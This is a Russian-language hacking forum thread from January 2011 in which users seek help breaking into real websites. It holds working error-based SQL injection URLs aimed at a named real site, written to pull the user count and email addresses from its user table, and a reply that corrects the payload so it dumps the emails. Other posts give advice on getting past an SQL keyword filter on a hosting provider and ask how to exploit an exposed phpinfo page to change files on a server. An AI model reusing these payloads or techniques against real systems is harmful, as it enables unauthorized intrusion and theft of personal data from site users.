 |
|
11.01.2011, 14:36
|
|
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами:
8680278
Репутация:
17
|
|
Глупый вопрос:
если я делаю запрос
Код:
www.xxx.ru/auth.php?id=1'
ничего не происходит, открывает ту же самою страницу,
То есть ' фильтруется?
/// Мдаа... |
|
|
11.01.2011, 14:39
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от cheater_man
Глупый вопрос:
если я делаю запрос
Код:
www.xxx.ru/auth.php?id=1'
ничего не происходит, открывает ту же самою страницу,
То есть ' фильтруется? действительно глупый вопрос. Вопрос очень странно поставлен, я затрудняюсь на него ответить.
|
|
|
|
11.01.2011, 22:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Подскажите мужики как обойти фильтрацию FROM в sql injection
Хостинг на SpaceWeb
|
|
|
|
11.01.2011, 23:12
|
|
Новичок
Регистрация: 28.06.2010
Сообщений: 1
С нами:
8354486
Репутация:
0
|
|
вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?
|
|
|
|
11.01.2011, 23:14
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от noviyuser
Подскажите мужики как обойти фильтрацию FROM в sql injection
Хостинг на SpaceWeb
Насколько я помню, там фильтруется последовательность union select from, обходится POST'ом, если скрипт его принимает, либо подзапросы.
|
|
|
|
11.01.2011, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Drakula208
вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?
попроси админа что бы дал тебе доступ по ssh..и тогда заходи..из пхпинфо слово инфо тебе о чем нибудь говорит? информация тебе поможет если ты нашел скуль и имеешь файл_прив ..либо инклюд..
|
|
|
|
12.01.2011, 11:30
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
вот такая проблема:
http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28s elect+count%280%20%29,concat%28%28select%20count%2 8*%29%20from%20user%29,floor%28rand%280%29*2%29%29 +from%20+information_schema.tables+group+by+2+limi t+1%29a%29
выдает количество юзеров в таблице user
Message: Can't execute query: Duplicate entry '17661' for key 1
но вот при выводе полей пишет ошибку:
http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28s elect+count%280%20%29,concat%28%28select%20mail%20 from%20user+limit+1,1%29,floor%28rand%280%29*2%29% 29+from%20+information_schema.tables+group+by+2+li mit+1%29a%29
Message: Can't execute query: Unknown column 'table_name' in 'field list'
в чем может быть проблема?
|
|
|
|
12.01.2011, 12:08
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Код:
http://www.uk121.com/events_view.php?eid=(select*from+(select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)
|
|
|
|
12.01.2011, 12:27
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
Сообщение от Seravin
Код:
http://www.uk121.com/events_view.php?eid=(select*from+select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)
так все равно вывода нет
|
|
|
|
12.01.2011, 12:34
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
скобку пропустил. исправил
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
